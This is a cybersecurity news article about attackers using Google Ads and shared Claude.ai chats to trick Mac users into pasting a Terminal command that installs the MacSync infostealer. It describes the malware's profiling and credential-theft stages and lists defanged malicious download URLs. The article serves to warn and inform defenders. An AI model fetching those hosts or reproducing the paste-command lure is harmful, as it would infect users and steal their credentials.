InfoSecBulletin Cybersecurity for mankind
As AI is advancing unpredictably cyber criminals also change their attack pattern which make challenge for cyber resilience. Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active advertising campaign.
Users looking for “Claude mac download” might find ads that show claude.ai as the site to visit. However, these can actually lead to steps that put malware on their Mac.
1-Click GitHub Token Flaw Allows Attackers Steal Users’ OAuth Tokens
TP-Link Router Flaw Enables Remote Command Execution Attacks
ALERT
Google patches one exploited Android zero-day and 124 issues
CISA warns two-year-old Oracle Vuln as actively exploited in attacks
Hackers Use Meta’s AI Bot to Take Over Instagram Accounts
Anthropic confirms Claude Mythos-class models will be public
Threat Actors Fake FIFA Sites to Steal Personal Info
CISA gives feds 4 days to fix cPanel plugin vulnerability
ALERT
FortiClient EMS Code Execution Flaw Exploited to Deploy Malware
Anthropic Unveils Free Security Plugin for Claude Code Terminal to Detect Flaws
Shared Claude Chats weaponized to target macOS users
The campaign was discovered by Berk Albayrak, a security expert at Trendyol Group, who posted his findings on LinkedIn.
Albayrak found a chat from Claude.ai that claims to be an official guide for “Claude Code on Mac,” saying it’s from “Apple Support.” The chat shows users how to open Terminal and paste a command, which secretly downloads and runs malware on their Mac.
Bleeping Computer reported, to verify Albayrak’s findings, they landed on a second shared Claude chat carrying out the same attack through entirely separate infrastructure.
The two chats follow an identical structure and social engineering approach but use different domains and payloads. Both chats were publicly accessible at the time of writing:
What does the macOS malware do?
The base64 instructions shown in the shared Claude chat download an encoded shell script from domains such as:
In variant seen by Albayrak [VirusTotal]: hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e
In variant seen by BleepingComputer [VirusTotal]: hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d’
The ‘loader.sh’ (served by the second link above) is another set of Gunzip-compressed shell instructions:
This script runs completely in memory, leaving little clear evidence on the disk.
BleepingComputer saw that the server sent a different hidden version of the payload for each request. This method is called polymorphic delivery. It makes it more difficult for security tools to detect the download using a known hash or signature.
The variant BleepingComputer identified starts by checking whether the machine has Russian or CIS-region keyboard input sources configured. If it does, the script exits without doing anything, sending a quiet cis_blocked status ping to the attacker’s server on its way out. Only machines that pass this check get the next stage:
Before going on, the script gathers the victim’s external IP address, hostname, OS version, and keyboard settings, then sends this information to the attacker. This profiling of the victim before sending the payload shows that the attackers are careful about who they choose to target.
The script downloads a second-stage payload and runs it using osascript, which is macOS’s built-in scripting tool. This allows the attacker to run code from far away without needing to install a usual app or binary.
The type found by Albayrak seems to skip profiling steps. It goes right to execution. It collects browser usernames and passwords, cookies, and macOS Keychain data, puts them together, and sends them to the attacker’s server. Albayrak found out this is a type of the MacSync macOS infostealer:
The briskinternet[.]com domain shown above in the variant identified by Albayrak appeared to be down at the time of writing. Click here to read full report.
